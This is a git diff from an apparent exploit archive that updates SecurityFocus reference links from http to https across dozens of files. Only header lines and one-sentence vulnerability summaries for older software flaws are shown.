--git a/exploits/multiple/remote/3359.pl b/exploits/multiple/remote/3359.pl index 8a4165589..e9ed04646 100755 --- a/exploits/multiple/remote/3359.pl +++ b/exploits/multiple/remote/3359.pl @@ -6,7 +6,7 @@ # # Tested on "Oracle Database 10g Enterprise Edition Release 10.1.0.3.0" # -# REF: http://www.securityfocus.com/bid/16294 +# REF: https://www.securityfocus.com/bid/16294 # # AUTHOR: Andrea "bunker" Purificato # http://rawlab.mindcreations.com diff --git a/exploits/multiple/remote/33600.rb b/exploits/multiple/remote/33600.rb index 67c3adeb7..a18cef82e 100755 --- a/exploits/multiple/remote/33600.rb +++ b/exploits/multiple/remote/33600.rb @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/38115/info +source: https://www.securityfocus.com/bid/38115/info Oracle Database is prone to multiple remote privilege-escalation issues because it fails to properly restrict access to certain packages. diff --git a/exploits/multiple/remote/33601.rb b/exploits/multiple/remote/33601.rb index 0f14468b8..a0823eaaf 100755 --- a/exploits/multiple/remote/33601.rb +++ b/exploits/multiple/remote/33601.rb @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/38115/info +source: https://www.securityfocus.com/bid/38115/info Oracle Database is prone to multiple remote privilege-escalation issues because it fails to properly restrict access to certain packages. diff --git a/exploits/multiple/remote/33615.txt b/exploits/multiple/remote/33615.txt index d8296a28e..70fbd7589 100644 --- a/exploits/multiple/remote/33615.txt +++ b/exploits/multiple/remote/33615.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/38143/info +source: https://www.securityfocus.com/bid/38143/info JDownloader is prone to a vulnerability that lets remote attackers execute arbitrary code. diff --git a/exploits/multiple/remote/33616.txt b/exploits/multiple/remote/33616.txt index 3c94234c1..b182ec3d2 100644 --- a/exploits/multiple/remote/33616.txt +++ b/exploits/multiple/remote/33616.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/38145/info +source: https://www.securityfocus.com/bid/38145/info Mongoose is prone to a remote file-disclosure vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/multiple/remote/3363.pl b/exploits/multiple/remote/3363.pl index 156b2c91a..c26761fca 100755 --- a/exploits/multiple/remote/3363.pl +++ b/exploits/multiple/remote/3363.pl @@ -6,7 +6,7 @@ # # Tested on "Oracle Database 10g Enterprise Edition Release 10.1.0.3.0" # -# REF: http://www.securityfocus.com/bid/16287 +# REF: https://www.securityfocus.com/bid/16287 # # AUTHOR: Andrea "bunker" Purificato # http://rawlab.mindcreations.com diff --git a/exploits/multiple/remote/33653.txt b/exploits/multiple/remote/33653.txt index b2a26c90d..49af89dad 100644 --- a/exploits/multiple/remote/33653.txt +++ b/exploits/multiple/remote/33653.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/38308/info +source: https://www.securityfocus.com/bid/38308/info PortWise SSL VPN is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/multiple/remote/33663.txt b/exploits/multiple/remote/33663.txt index 83fdc630d..53cab5fba 100644 --- a/exploits/multiple/remote/33663.txt +++ b/exploits/multiple/remote/33663.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/38360/info +source: https://www.securityfocus.com/bid/38360/info IBM WebSphere Portal is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/multiple/remote/33664.html b/exploits/multiple/remote/33664.html index 19d847ba9..61f85f110 100644 --- a/exploits/multiple/remote/33664.html +++ b/exploits/multiple/remote/33664.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/38369/info +source: https://www.securityfocus.com/bid/38369/info Mozilla Firefox is prone to a remote information-disclosure vulnerability. diff --git a/exploits/multiple/remote/33682.txt b/exploits/multiple/remote/33682.txt index b5bca3c02..2744fa548 100644 --- a/exploits/multiple/remote/33682.txt +++ b/exploits/multiple/remote/33682.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/38456/info +source: https://www.securityfocus.com/bid/38456/info Oracle Siebel is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/multiple/remote/33686.txt b/exploits/multiple/remote/33686.txt index b0a28b8af..2d791faca 100644 --- a/exploits/multiple/remote/33686.txt +++ b/exploits/multiple/remote/33686.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/38481/info +source: https://www.securityfocus.com/bid/38481/info IBM Lotus Domino is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/multiple/remote/33689.as b/exploits/multiple/remote/33689.as index 3fe0b9c0d..ffea3102c 100644 --- a/exploits/multiple/remote/33689.as +++ b/exploits/multiple/remote/33689.as @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/38517/info +source: https://www.securityfocus.com/bid/38517/info Adobe Flash Player is prone to an information-disclosure vulnerability. diff --git a/exploits/multiple/remote/3376.pl b/exploits/multiple/remote/3376.pl index c8c487cb2..e2767312d 100755 --- a/exploits/multiple/remote/3376.pl +++ b/exploits/multiple/remote/3376.pl @@ -9,7 +9,7 @@ # # Tested on "Oracle Database 10g Enterprise Edition Release 10.1.0.3.0" # -# REF: http://www.securityfocus.com/bid/16294 +# REF: https://www.securityfocus.com/bid/16294 # # AUTHOR: Andrea "bunker" Purificato # http://rawlab.mindcreations.com diff --git a/exploits/multiple/remote/3377.pl b/exploits/multiple/remote/3377.pl index cf4dfee74..218aaf450 100755 --- a/exploits/multiple/remote/3377.pl +++ b/exploits/multiple/remote/3377.pl @@ -9,7 +9,7 @@ # # Tested on "Oracle Database 10g Enterprise Edition Release 10.1.0.3.0" # -# REF: http://www.securityfocus.com/bid/16287 +# REF: https://www.securityfocus.com/bid/16287 # # AUTHOR: Andrea "bunker" Purificato # http://rawlab.mindcreations.com diff --git a/exploits/multiple/remote/33774.txt b/exploits/multiple/remote/33774.txt index 1afde5318..c5c97f20e 100644 --- a/exploits/multiple/remote/33774.txt +++ b/exploits/multiple/remote/33774.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/38852/info +source: https://www.securityfocus.com/bid/38852/info IBM Lotus Notes is prone to an open-redirection vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/multiple/remote/33780.txt b/exploits/multiple/remote/33780.txt index be8e42d89..4173e1079 100644 --- a/exploits/multiple/remote/33780.txt +++ b/exploits/multiple/remote/33780.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/38880/info +source: https://www.securityfocus.com/bid/38880/info IBM Lotus Notes is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/multiple/remote/33786.txt b/exploits/multiple/remote/33786.txt index da7688cf8..b718476ad 100644 --- a/exploits/multiple/remote/33786.txt +++ b/exploits/multiple/remote/33786.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/38897/info +source: https://www.securityfocus.com/bid/38897/info Cafu is prone to a remote NULL pointer dereference vulnerability and a remote client format string vulnerability. diff --git a/exploits/multiple/remote/33802.txt b/exploits/multiple/remote/33802.txt index ce8ac4c31..5a0fe77b2 100644 --- a/exploits/multiple/remote/33802.txt +++ b/exploits/multiple/remote/33802.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/38974/info +source: https://www.securityfocus.com/bid/38974/info RakNet is prone to a remote integer-underflow vulnerability because it fails to sufficiently validate an integer value. diff --git a/exploits/multiple/remote/33816.pl b/exploits/multiple/remote/33816.pl index a4593a168..76f0690a9 100755 --- a/exploits/multiple/remote/33816.pl +++ b/exploits/multiple/remote/33816.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/39209/info +source: https://www.securityfocus.com/bid/39209/info Miranda IM is prone to an information-disclosure vulnerability. diff --git a/exploits/multiple/remote/33839.txt b/exploits/multiple/remote/33839.txt index 8ef577aac..e47d1a393 100644 --- a/exploits/multiple/remote/33839.txt +++ b/exploits/multiple/remote/33839.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/39510/info +source: https://www.securityfocus.com/bid/39510/info Oracle E-Business Suite Financials is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/multiple/remote/33847.txt b/exploits/multiple/remote/33847.txt index 1975799d0..ab7d67d23 100644 --- a/exploits/multiple/remote/33847.txt +++ b/exploits/multiple/remote/33847.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/39555/info +source: https://www.securityfocus.com/bid/39555/info netkar-PRO is prone to a remote stack-based buffer-overflow vulnerability because it fails to properly bounds-check messages before copying them to an insufficiently sized memory buffer. diff --git a/exploits/multiple/remote/33868.txt b/exploits/multiple/remote/33868.txt index 4fe03faee..f65bca9cb 100644 --- a/exploits/multiple/remote/33868.txt +++ b/exploits/multiple/remote/33868.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/39636/info +source: https://www.securityfocus.com/bid/39636/info Apache ActiveMQ is prone to a vulnerability that lets attackers access source code because it fails to properly sanitize user-supplied input. diff --git a/exploits/multiple/remote/33871.txt b/exploits/multiple/remote/33871.txt index f56c850af..74b0283ae 100644 --- a/exploits/multiple/remote/33871.txt +++ b/exploits/multiple/remote/33871.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/39666/info +source: https://www.securityfocus.com/bid/39666/info Tiny Java Web Server is prone to multiple input-validation vulnerabilities because it fails to adequately sanitize user-supplied input. These vulnerabilities include a directory-traversal vulnerability, an open-redirection vulnerability, and a source code information-disclosure vulnerability. diff --git a/exploits/multiple/remote/33873.txt b/exploits/multiple/remote/33873.txt index 2ff468498..f06b2f372 100644 --- a/exploits/multiple/remote/33873.txt +++ b/exploits/multiple/remote/33873.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/39676/info +source: https://www.securityfocus.com/bid/39676/info HP System Management Homepage is prone to an open-redirection vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/multiple/remote/33877.c b/exploits/multiple/remote/33877.c index 2cf2d1897..9298c7bb0 100644 --- a/exploits/multiple/remote/33877.c +++ b/exploits/multiple/remote/33877.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/39693/info +source: https://www.securityfocus.com/bid/39693/info NovaStor NovaNET is prone to code-execution, denial-of-service, and information-disclosure vulnerabilities. diff --git a/exploits/multiple/remote/33878.c b/exploits/multiple/remote/33878.c index 766b1c97d..9009364f5 100644 --- a/exploits/multiple/remote/33878.c +++ b/exploits/multiple/remote/33878.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/39693/info +// source: https://www.securityfocus.com/bid/39693/info NovaStor NovaNET is prone to code-execution, denial-of-service, and information-disclosure vulnerabilities. diff --git a/exploits/multiple/remote/33905.txt b/exploits/multiple/remote/33905.txt index 644bb3def..d875c1881 100644 --- a/exploits/multiple/remote/33905.txt +++ b/exploits/multiple/remote/33905.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/39771/info +source: https://www.securityfocus.com/bid/39771/info Apache ActiveMQ is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/multiple/remote/33907.txt b/exploits/multiple/remote/33907.txt index 105b9978e..a4886b4ee 100644 --- a/exploits/multiple/remote/33907.txt +++ b/exploits/multiple/remote/33907.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/39789/info +source: https://www.securityfocus.com/bid/39789/info The ZKSoftware ZK5000 device is prone to a remote information-disclosure vulnerability. diff --git a/exploits/multiple/remote/33940.txt b/exploits/multiple/remote/33940.txt index 6eb5804db..0e53583c6 100644 --- a/exploits/multiple/remote/33940.txt +++ b/exploits/multiple/remote/33940.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/39949/info +source: https://www.securityfocus.com/bid/39949/info VMware View is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/multiple/remote/34048.html b/exploits/multiple/remote/34048.html index bbffa9010..225255e8b 100644 --- a/exploits/multiple/remote/34048.html +++ b/exploits/multiple/remote/34048.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/40407/info +source: https://www.securityfocus.com/bid/40407/info Brekeke PBX is prone to a cross-site request-forgery vulnerability. diff --git a/exploits/multiple/remote/34186.txt b/exploits/multiple/remote/34186.txt index 901a12d99..729cb78e9 100644 --- a/exploits/multiple/remote/34186.txt +++ b/exploits/multiple/remote/34186.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/41076/info +source: https://www.securityfocus.com/bid/41076/info Apache Axis2 is prone to a session-fixation vulnerability. diff --git a/exploits/multiple/remote/34271.txt b/exploits/multiple/remote/34271.txt index 1eab65310..01f475a3b 100644 --- a/exploits/multiple/remote/34271.txt +++ b/exploits/multiple/remote/34271.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/41460/info +source: https://www.securityfocus.com/bid/41460/info id Tech 4 Engine is prone to a remote code-execution vulnerability. diff --git a/exploits/multiple/remote/34297.txt b/exploits/multiple/remote/34297.txt index 5a1cdbcf6..005c81e78 100644 --- a/exploits/multiple/remote/34297.txt +++ b/exploits/multiple/remote/34297.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/41560/info +source: https://www.securityfocus.com/bid/41560/info dotDefender is prone to a security-bypass vulnerability because it fails to restrict malicious data from reaching protected sites. diff --git a/exploits/multiple/remote/34301.txt b/exploits/multiple/remote/34301.txt index 075581751..874c32616 100644 --- a/exploits/multiple/remote/34301.txt +++ b/exploits/multiple/remote/34301.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/41571/info +source: https://www.securityfocus.com/bid/41571/info The Asterisk Recording Interface is prone to the following issues: diff --git a/exploits/multiple/remote/34310.txt b/exploits/multiple/remote/34310.txt index 00b3f6582..6ab29d2e7 100644 --- a/exploits/multiple/remote/34310.txt +++ b/exploits/multiple/remote/34310.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/41617/info +source: https://www.securityfocus.com/bid/41617/info Oracle Business Process Management is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/multiple/remote/34312.txt b/exploits/multiple/remote/34312.txt index 010b3d7d0..4da3c8726 100644 --- a/exploits/multiple/remote/34312.txt +++ b/exploits/multiple/remote/34312.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/41620/info +source: https://www.securityfocus.com/bid/41620/info Oracle WebLogic Server is prone to a remote vulnerability. diff --git a/exploits/multiple/remote/34369.txt b/exploits/multiple/remote/34369.txt index 821f2f6f3..e7c785ab8 100644 --- a/exploits/multiple/remote/34369.txt +++ b/exploits/multiple/remote/34369.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/41918/info +source: https://www.securityfocus.com/bid/41918/info IBM Java is prone to a security-bypass vulnerability because it fails to sufficiently sanitize user-supplied input. diff --git a/exploits/multiple/remote/34372.txt b/exploits/multiple/remote/34372.txt index e0e3bc05c..cb37e603e 100644 --- a/exploits/multiple/remote/34372.txt +++ b/exploits/multiple/remote/34372.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/41929/info +source: https://www.securityfocus.com/bid/41929/info Twonky Server is prone to a cross-site scripting vulnerability and multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/multiple/remote/34439.txt b/exploits/multiple/remote/34439.txt index fbdd4845f..b728f3ffe 100644 --- a/exploits/multiple/remote/34439.txt +++ b/exploits/multiple/remote/34439.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/42411/info +source: https://www.securityfocus.com/bid/42411/info ServletExec is prone to a directory-traversal vulnerability and multiple authentication-bypass vulnerabilities because the application fails to sufficiently sanitize user-supplied input. diff --git a/exploits/multiple/remote/34500.html b/exploits/multiple/remote/34500.html index 37aa6bf42..759d7a1eb 100644 --- a/exploits/multiple/remote/34500.html +++ b/exploits/multiple/remote/34500.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/42556/info +source: https://www.securityfocus.com/bid/42556/info Flock Browser is prone to an HTML-injection vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/multiple/remote/34523.txt b/exploits/multiple/remote/34523.txt index 8554d7b3a..d39bf8c69 100644 --- a/exploits/multiple/remote/34523.txt +++ b/exploits/multiple/remote/34523.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/42661/info +source: https://www.securityfocus.com/bid/42661/info Nagios XI is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/multiple/remote/34691.txt b/exploits/multiple/remote/34691.txt index 4b08b99b6..a8ecfd6ea 100644 --- a/exploits/multiple/remote/34691.txt +++ b/exploits/multiple/remote/34691.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/43378/info +source: https://www.securityfocus.com/bid/43378/info CollabNet Subversion Edge is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/multiple/remote/34796.txt b/exploits/multiple/remote/34796.txt index 3066e7b83..5d828a706 100644 --- a/exploits/multiple/remote/34796.txt +++ b/exploits/multiple/remote/34796.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/43677/info +source: https://www.securityfocus.com/bid/43677/info MySQL is prone to a remote privilege-escalation vulnerability. diff --git a/exploits/multiple/remote/34945.txt b/exploits/multiple/remote/34945.txt index 4e9e389b5..7ac66c251 100644 --- a/exploits/multiple/remote/34945.txt +++ b/exploits/multiple/remote/34945.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/44580/info +source: https://www.securityfocus.com/bid/44580/info Home File Share Server is prone to a directory-traversal vulnerability because the application fails to sufficiently sanitize user-supplied input. diff --git a/exploits/multiple/remote/34949.py b/exploits/multiple/remote/34949.py index d32cdb3bc..ab74a9be3 100755 --- a/exploits/multiple/remote/34949.py +++ b/exploits/multiple/remote/34949.py @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/44597/info +source: https://www.securityfocus.com/bid/44597/info BroadWorks is prone to a security-bypass vulnerability. diff --git a/exploits/multiple/remote/34952.txt b/exploits/multiple/remote/34952.txt index 3c0d9aa4c..2bef18e3e 100644 --- a/exploits/multiple/remote/34952.txt +++ b/exploits/multiple/remote/34952.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/44616/info +source: https://www.securityfocus.com/bid/44616/info Apache Shiro is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input. diff --git a/exploits/multiple/remote/35003.txt b/exploits/multiple/remote/35003.txt index b210d6510..3a1c04136 100644 --- a/exploits/multiple/remote/35003.txt +++ b/exploits/multiple/remote/35003.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/44940/info +source: https://www.securityfocus.com/bid/44940/info IBM OmniFind is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/multiple/remote/35062.txt b/exploits/multiple/remote/35062.txt index 51644004e..e1a7048ce 100644 --- a/exploits/multiple/remote/35062.txt +++ b/exploits/multiple/remote/35062.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/45245/info +source: https://www.securityfocus.com/bid/45245/info RDM Embedded is prone to a buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data. The issue affects the 'lm_tcp' service. diff --git a/exploits/multiple/remote/35092.html b/exploits/multiple/remote/35092.html index 5547d6d32..0be68b630 100644 --- a/exploits/multiple/remote/35092.html +++ b/exploits/multiple/remote/35092.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/45340/info +source: https://www.securityfocus.com/bid/45340/info Helix Server is prone to a cross-site request-forgery vulnerability. diff --git a/exploits/multiple/remote/35144.txt b/exploits/multiple/remote/35144.txt index 648e95620..294f80ba0 100644 --- a/exploits/multiple/remote/35144.txt +++ b/exploits/multiple/remote/35144.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/45568/info +source: https://www.securityfocus.com/bid/45568/info Appweb is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/multiple/remote/35242.txt b/exploits/multiple/remote/35242.txt index 1593e330c..bfcaf8fc7 100644 --- a/exploits/multiple/remote/35242.txt +++ b/exploits/multiple/remote/35242.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/45921/info +source: https://www.securityfocus.com/bid/45921/info Eclipse IDE is prone to multiple cross-site-scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/multiple/remote/35243.txt b/exploits/multiple/remote/35243.txt index 40742d0c5..81dc3143f 100644 --- a/exploits/multiple/remote/35243.txt +++ b/exploits/multiple/remote/35243.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/45921/info +source: https://www.securityfocus.com/bid/45921/info Eclipse IDE is prone to multiple cross-site-scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/multiple/remote/35252.php b/exploits/multiple/remote/35252.php index 990bbbc98..507080292 100644 --- a/exploits/multiple/remote/35252.php +++ b/exploits/multiple/remote/35252.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/45973/info +source: https://www.securityfocus.com/bid/45973/info The 'libxml2' library is prone to a local information-disclosure vulnerability. diff --git a/exploits/multiple/remote/35284.pl b/exploits/multiple/remote/35284.pl index ce114bd90..83ef90d2c 100755 --- a/exploits/multiple/remote/35284.pl +++ b/exploits/multiple/remote/35284.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/46003/info +source: https://www.securityfocus.com/bid/46003/info Opera Web Browser is prone to a remote integer-overflow vulnerability. diff --git a/exploits/multiple/remote/35316.sh b/exploits/multiple/remote/35316.sh index 21f0db690..6bda39440 100755 --- a/exploits/multiple/remote/35316.sh +++ b/exploits/multiple/remote/35316.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/46178/info +source: https://www.securityfocus.com/bid/46178/info The SMC Networks SMCD3G gateway is prone to a remote authentication-bypass vulnerability. diff --git a/exploits/multiple/remote/35352.rb b/exploits/multiple/remote/35352.rb index 3311dcf7a..df2597f0b 100755 --- a/exploits/multiple/remote/35352.rb +++ b/exploits/multiple/remote/35352.rb @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/46423/info +source: https://www.securityfocus.com/bid/46423/info Ruby on Rails is prone to a vulnerability that allows attackers to inject arbitrary content into the 'X-Forwarded-For', 'X-Forwarded-Host' and 'X-Forwarded-Server' HTTP headers because the 'WEBrick::HTTPRequest' module fails to sufficiently sanitize input. diff --git a/exploits/multiple/remote/35364.txt b/exploits/multiple/remote/35364.txt index 32fdd4683..230a9e8d7 100644 --- a/exploits/multiple/remote/35364.txt +++ b/exploits/multiple/remote/35364.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/46471/info +source: https://www.securityfocus.com/bid/46471/info IBM Lotus Sametime Server is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/multiple/remote/35366.txt b/exploits/multiple/remote/35366.txt index c55724ca0..a7ab63454 100644 --- a/exploits/multiple/remote/35366.txt +++ b/exploits/multiple/remote/35366.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/46471/info +source: https://www.securityfocus.com/bid/46471/info IBM Lotus Sametime Server is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/multiple/remote/35398.pl b/exploits/multiple/remote/35398.pl index 301742b6a..a89535783 100755 --- a/exploits/multiple/remote/35398.pl +++ b/exploits/multiple/remote/35398.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/46608/info +source: https://www.securityfocus.com/bid/46608/info KMPlayer is prone to a remote buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied input. diff --git a/exploits/multiple/remote/35464.txt b/exploits/multiple/remote/35464.txt index 63a7c91de..35ced3a9b 100644 --- a/exploits/multiple/remote/35464.txt +++ b/exploits/multiple/remote/35464.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/46864/info +source: https://www.securityfocus.com/bid/46864/info Trend Micro WebReputation API is prone to a security-bypass vulnerability. diff --git a/exploits/multiple/remote/35495.txt b/exploits/multiple/remote/35495.txt index b5c7c0902..8b8c6919f 100644 --- a/exploits/multiple/remote/35495.txt +++ b/exploits/multiple/remote/35495.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/47008/info +source: https://www.securityfocus.com/bid/47008/info Advantech/BroadWin SCADA WebAccess is prone to multiple remote vulnerabilities including an information-disclosure issue and a remote code-execution issue. diff --git a/exploits/multiple/remote/35501.pl b/exploits/multiple/remote/35501.pl index 2e72cae43..82f877971 100755 --- a/exploits/multiple/remote/35501.pl +++ b/exploits/multiple/remote/35501.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/47039/info +source: https://www.securityfocus.com/bid/47039/info RealPlayer is prone to a remote buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied input. diff --git a/exploits/multiple/remote/35570.txt b/exploits/multiple/remote/35570.txt index 63764fedc..dff02865e 100644 --- a/exploits/multiple/remote/35570.txt +++ b/exploits/multiple/remote/35570.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/47177/info +source: https://www.securityfocus.com/bid/47177/info python-feedparser is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/multiple/remote/35638.txt b/exploits/multiple/remote/35638.txt index ca624ddb9..20a40b998 100644 --- a/exploits/multiple/remote/35638.txt +++ b/exploits/multiple/remote/35638.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/47479/info +source: https://www.securityfocus.com/bid/47479/info Oracle JD Edwards EnterpriseOne is prone to multiple cross-site scripting vulnerabilities. diff --git a/exploits/multiple/remote/35639.txt b/exploits/multiple/remote/35639.txt index c16d55d31..b8aa8764a 100644 --- a/exploits/multiple/remote/35639.txt +++ b/exploits/multiple/remote/35639.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/47479/info +source: https://www.securityfocus.com/bid/47479/info Oracle JD Edwards EnterpriseOne is prone to multiple cross-site scripting vulnerabilities. diff --git a/exploits/multiple/remote/35640.txt b/exploits/multiple/remote/35640.txt index 73ce5b1c1..11a257a92 100644 --- a/exploits/multiple/remote/35640.txt +++ b/exploits/multiple/remote/35640.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/47479/info +source: https://www.securityfocus.com/bid/47479/info Oracle JD Edwards EnterpriseOne is prone to multiple cross-site scripting vulnerabilities. diff --git a/exploits/multiple/remote/35641.txt b/exploits/multiple/remote/35641.txt index 328afd615..6d86aced7 100644 --- a/exploits/multiple/remote/35641.txt +++ b/exploits/multiple/remote/35641.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/47479/info +source: https://www.securityfocus.com/bid/47479/info Oracle JD Edwards EnterpriseOne is prone to multiple cross-site scripting vulnerabilities. diff --git a/exploits/multiple/remote/35642.txt b/exploits/multiple/remote/35642.txt index a983246e4..c851fdd72 100644 --- a/exploits/multiple/remote/35642.txt +++ b/exploits/multiple/remote/35642.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/47479/info +source: https://www.securityfocus.com/bid/47479/info Oracle JD Edwards EnterpriseOne is prone to multiple cross-site scripting vulnerabilities. diff --git a/exploits/multiple/remote/35685.txt b/exploits/multiple/remote/35685.txt index b34fab938..879c0cea4 100644 --- a/exploits/multiple/remote/35685.txt +++ b/exploits/multiple/remote/35685.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/47676/info +source: https://www.securityfocus.com/bid/47676/info Asterisk is prone to a user-enumeration weakness. diff --git a/exploits/multiple/remote/35703.py b/exploits/multiple/remote/35703.py index 6b3b96598..f6ed5fb4f 100755 --- a/exploits/multiple/remote/35703.py +++ b/exploits/multiple/remote/35703.py @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/47710/info +source: https://www.securityfocus.com/bid/47710/info sipdroid is prone to a user-enumeration weakness. diff --git a/exploits/multiple/remote/35729.txt b/exploits/multiple/remote/35729.txt index 677669e02..c11fc910d 100644 --- a/exploits/multiple/remote/35729.txt +++ b/exploits/multiple/remote/35729.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/47780/info +source: https://www.securityfocus.com/bid/47780/info Imperva SecureSphere is prone to a security-bypass vulnerability. diff --git a/exploits/multiple/remote/35735.txt b/exploits/multiple/remote/35735.txt index 8bb6d3a36..b6c6e3989 100644 --- a/exploits/multiple/remote/35735.txt +++ b/exploits/multiple/remote/35735.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/47784/info +source: https://www.securityfocus.com/bid/47784/info Apache Struts is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/multiple/remote/35790.py b/exploits/multiple/remote/35790.py index 8e0f421b0..3116ed834 100755 --- a/exploits/multiple/remote/35790.py +++ b/exploits/multiple/remote/35790.py @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/47952/info +source: https://www.securityfocus.com/bid/47952/info Lumension Security Lumension Device Control (formerly Sanctuary) is prone to a memory-corruption vulnerability. diff --git a/exploits/multiple/remote/35792.txt b/exploits/multiple/remote/35792.txt index a7d0deb73..de5493729 100644 --- a/exploits/multiple/remote/35792.txt +++ b/exploits/multiple/remote/35792.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/47957/info +source: https://www.securityfocus.com/bid/47957/info 